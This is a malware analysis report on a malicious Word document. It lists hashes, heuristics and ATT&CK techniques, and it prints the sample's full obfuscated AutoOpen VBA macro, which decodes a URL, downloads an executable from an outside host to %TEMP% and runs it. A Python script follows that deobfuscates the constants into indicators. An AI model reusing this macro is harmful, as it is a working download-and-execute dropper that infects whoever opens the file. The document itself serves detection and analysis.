Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c91578a76f099b31…

MALICIOUS

Office (OLE)

Size: 30.5 KB
Created: 2015-01-19 10:28:00
Authoring application: Microsoft Office Word
First seen: 2015-02-17
MD5: f9d2458458dd49e9ce7c9894c540c4d5
SHA-1: 8322901f799749042077030eeb248d80f9187e93
SHA-256: c91578a76f099b311eecc51bf9511e8de366272b1638a82b75208b89f9053932
Risk Score: 256

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1140 Deobfuscate/Decode Files or Information
T1071.001 Application Layer Protocol: Web Protocols
T1204.002 User Execution: Malicious File

The critical heuristic 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' indicates an obfuscated auto-exec VBA loader. Every string the macro needs (COM ProgIDs, the HTTP verb, the URL, the environment variable name and the file name) is stored as a Base64 constant and decoded at run time by the custom function 'NsCj'; only the decoder and the sink calls are visible in plain text. The function 'JyXsorj' instantiates 'MSXML2.XMLHTTP' via 'CreateObject', issues a GET for the decoded URL 'http://stylishmaldives.com/js/bin.exe', writes the response body to '%TEMP%\iHGdsf.exe' (Environ("TEMP") joined with the decoded file name, so the target is the opening user's temp directory) and then launches that file through 'Shell.Application'.Open. The 'autoopen' subroutine triggers this chain when the document is opened, via two trivial wrapper subs ('iwpHOuE6r' and 'nJFIm') whose only purpose is to distance the auto-exec entry point from the download-and-execute code.

Heuristics (8)

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, junk-token Replace removal, or, as here, a hand-rolled Base64 routine) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps the ProgIDs, shell commands and URLs out of the macro source as plain strings, so a string-based scanner sees only the decoder and the sink call, not what is instantiated or fetched.
    Matched line in script
        Set hUIGGYdfg = CreateObject(NsCj(jSr7Aw))
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set hUIGGYdfg = CreateObject(NsCj(jSr7Aw))
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    sdfsdfsd.Open Environ(NsCj(aXpVWjFOR)) & NsCj(WbqiAH)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. For this sample the VBA project was in fact recovered (macros.bas below), so the marker duplicates the AutoOpen finding above rather than adding evidence.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename     Kind        Source                                                Size
macros.bas   vba-macro   oletools.olevba.extract_macros (decoded VBA source)   2920 bytes
SHA-256: 24b5c0e6db7be2f7542b69d798efeb41b841f9de88730f0fe32a92176c18ded4

Extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Const DYAVRU2O7CQK = "XGlIR2RzZi5leGU="
Private Const u4UPbupdHqn = "VEVNUA=="
Private Const JGYEERm = "aHR0cDovL3N0eWxpc2htYWxkaXZlcy5jb20vanMvYmluLmV4ZQ=="
Private Const WbqiAH = DYAVRU2O7CQK
Private Const aXpVWjFOR = u4UPbupdHqn
Private Const UUMbhwG = "U2hlbGwuQXBwbGljYXRpb24="
Private Const s1tNlT1AWf = ""
Private Const FTKZS = "R0VU"
Private Const jSr7Aw = "TVNYTUwyLlhNTEhUVFA="
Private Const LZKV = ""
Private Const JLR = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

Sub iwpHOuE6r()
 nJFIm
End Sub
Sub eODC7ApCVQ()
     iwpHOuE6r
End Sub
Sub autoopen()
     iwpHOuE6r
End Sub
Function JyXsorj(ByVal sdfwefwef As String, ByVal pNJKBjkdsf As String) As Boolean
    Dim hUIGGYdfg As Object, i As Long, GYUbjsdf As Long, hjjjjjb() As Byte
     

    Set hUIGGYdfg = CreateObject(NsCj(jSr7Aw))
    hUIGGYdfg.Open NsCj(FTKZS), sdfwefwef, False
    hUIGGYdfg.Send

hjjjjjb = hUIGGYdfg.responseBody

    GYUbjsdf = FreeFile
    Open pNJKBjkdsf For Binary Access Write As #GYUbjsdf
    Put #GYUbjsdf, , hjjjjjb
    Close #GYUbjsdf

    Set hUIGGYdfg = Nothing

Set sdfsdfsd = CreateObject(NsCj(UUMbhwG))
sdfsdfsd.Open Environ(NsCj(aXpVWjFOR)) & NsCj(WbqiAH)
    End Function
Sub nJFIm()
FFewr43 = NsCj(JGYEERm)
     JyXsorj FFewr43, Environ(NsCj(aXpVWjFOR)) & NsCj(WbqiAH)

End Sub
Public Function NsCj(strInput As String) As String

On Error Resume Next
On Local Error Resume Next
Dim arrChars64() As Byte
Dim arrChars64Rev() As Byte
Dim arrInput() As Byte
Dim arrOutput() As Byte
Dim arrChar(4) As Integer
Dim intLen As Long
Dim intDelta As Long
Dim i As Long
Dim j As Long
Const Base64 = JLR
arrChars64() = StrConv(Base64, vbFromUnicode)
ReDim arrChars64Rev(255)
For i = 0 To UBound(arrChars64)
arrChars64Rev(arrChars64(i)) = i
Next i
intLen = Len(strInput)
If intLen = 0 Then Exit Function
intDelta = intLen Mod 4
If intDelta > 0 Then
strInput = strInput + String$(4 - intDelta, 0)
intLen = Len(strInput)
End If
arrInput() = StrConv(strInput, vbFromUnicode)
ReDim arrOutput(((intLen + 1) / 4) * 3)
For i = 0 To UBound(arrInput) Step 4
arrChar(1) = arrChars64Rev(arrInput(i))
arrChar(2) = arrChars64Rev(arrInput(i + 1))
arrChar(3) = arrChars64Rev(arrInput(i + 2))
arrChar(4) = arrChars64Rev(arrInput(i + 3))
arrOutput(j) = ((arrChar(1) * 4 + Int(arrChar(2) / 16)) And 255)
j = j + 1
arrOutput(j) = ((arrChar(2) * 16 + Int(arrChar(3) / 4)) And 255)
j = j + 1
arrOutput(j) = ((arrChar(3) * 64 + arrChar(4)) And 255)
j = j + 1
Next
 NsCj = Replace(StrConv(arrOutput, vbUnicode), vbNullChar, "")
End Function
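The summary above and the heuristic descriptions rely on the analyst reproducing what 'NsCj' does to the Base64 constants. The following script is an added example and is not part of the report's tooling or the olevba output: it ports the macro's decoder to Python, resolves the Const-to-Const aliases (such as WbqiAH = DYAVRU2O7CQK), rewrites each NsCj(...) call site with its plaintext and pulls out the URL, ProgIDs and drop path, all without executing the macro. The excerpt in MACRO_SOURCE is constructed by copying the constant declarations and sink lines from macros.bas above; the function names, regexes and the latin-1 stand-in for VBA's ANSI-to-Unicode conversion are my own assumptions.

```python
"""Static de-obfuscation of the Base64-constant loader pattern in this sample.
Re-implements the macro's NsCj() decoder and resolves every NsCj(<const>)
argument to plaintext without running the macro, which is how the URL,
ProgIDs and drop path in the summary are recovered."""
import re

# Constructed input: the Const declarations and the NsCj() call sites copied
# from the extracted macros.bas above. In practice feed the whole olevba output.
MACRO_SOURCE = r'''
Private Const DYAVRU2O7CQK = "XGlIR2RzZi5leGU="
Private Const u4UPbupdHqn = "VEVNUA=="
Private Const JGYEERm = "aHR0cDovL3N0eWxpc2htYWxkaXZlcy5jb20vanMvYmluLmV4ZQ=="
Private Const WbqiAH = DYAVRU2O7CQK
Private Const aXpVWjFOR = u4UPbupdHqn
Private Const UUMbhwG = "U2hlbGwuQXBwbGljYXRpb24="
Private Const s1tNlT1AWf = ""
Private Const FTKZS = "R0VU"
Private Const jSr7Aw = "TVNYTUwyLlhNTEhUVFA="
Private Const LZKV = ""
    Set hUIGGYdfg = CreateObject(NsCj(jSr7Aw))
    hUIGGYdfg.Open NsCj(FTKZS), sdfwefwef, False
Set sdfsdfsd = CreateObject(NsCj(UUMbhwG))
sdfsdfsd.Open Environ(NsCj(aXpVWjFOR)) & NsCj(WbqiAH)
FFewr43 = NsCj(JGYEERm)
'''

B64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
REV = {c: i for i, c in enumerate(B64)}   # the macro's arrChars64Rev table
CONST_RE = re.compile(r'^\s*(?:Private|Public)?\s*Const\s+(\w+)\s*=\s*(.+?)\s*$', re.M)
CALL_RE = re.compile(r'NsCj\((\w+)\)')
ENV_CONCAT_RE = re.compile(r'Environ\(NsCj\((\w+)\)\)\s*&\s*NsCj\((\w+)\)')

def nscj(s):
    """Port of NsCj(). Standard alphabet; '=' and the chr(0) padding that VBA
    appends for lengths not divisible by 4 look up as 0 (unset table slot).
    For well-formed Base64 the surplus bytes are NUL and get stripped, exactly
    as Replace(..., vbNullChar, "") does. Emulated instead of calling
    base64.b64decode so odd inputs decode the way the macro would."""
    if not s:
        return ""
    if len(s) % 4:
        s += "\x00" * (4 - len(s) % 4)
    out = bytearray()
    for i in range(0, len(s), 4):
        c = [REV.get(ch, 0) for ch in s[i:i + 4]]
        out.append((c[0] * 4 + c[1] // 16) & 255)
        out.append((c[1] * 16 + c[2] // 4) & 255)
        out.append((c[2] * 64 + c[3]) & 255)
    # Assumption: latin-1 stands in for StrConv(..., vbUnicode) on the ANSI code page.
    return out.decode("latin-1").replace("\x00", "")

def parse_constants(src):
    """Name -> literal, following alias chains such as WbqiAH = DYAVRU2O7CQK."""
    raw = dict(CONST_RE.findall(src))

    def resolve(name, seen=()):
        value = raw[name]
        if value.startswith('"'):
            return value.strip('"')
        if value in raw and value not in seen:   # Const defined by another Const
            return resolve(value, seen + (name,))
        return value
    return {name: resolve(name) for name in raw}

def decode_constants(src):
    """Name -> plaintext that NsCj() would return for each Const."""
    return {n: nscj(v) for n, v in parse_constants(src).items()}

def resolve_sinks(src):
    """Rewrite every NsCj(<const>) call with its plaintext so the sink lines
    read as the malware author wrote them; returns (original, deobfuscated)."""
    consts = decode_constants(src)
    pairs = []
    for line in src.splitlines():
        if "NsCj(" in line:
            deob = CALL_RE.sub(lambda m: '"%s"' % consts.get(m.group(1), "?"), line)
            pairs.append((line.strip(), deob.strip()))
    return pairs

def drop_path(src):
    """Rebuild Environ(<var>) & <suffix>, the download target, as %VAR%<suffix>."""
    consts = decode_constants(src)
    m = ENV_CONCAT_RE.search(src)
    return "%%%s%%%s" % (consts[m.group(1)], consts[m.group(2)]) if m else None

def extract_iocs(src):
    """Indicators worth blocking or hunting on, taken from the decoded constants."""
    values = list(decode_constants(src).values())
    return {
        "urls": sorted(v for v in values if re.match(r'https?://', v)),
        "progids": sorted(v for v in values
                          if re.fullmatch(r'[A-Za-z0-9]+(\.[A-Za-z0-9]+)+', v)),
        "drop_path": drop_path(src),
    }

if __name__ == "__main__":
    for original, deob in resolve_sinks(MACRO_SOURCE):
        print(original, "->", deob)
    print(extract_iocs(MACRO_SOURCE))
```

Running it prints each sink line with the ProgIDs, verb, URL and path substituted in, followed by the indicator set. The decoder is ported arithmetically rather than replaced with base64.b64decode so that any non-standard input the author might have used (missing padding, stray characters mapped to 0) decodes exactly as it would inside Word; for standard-encoded strings the two agree.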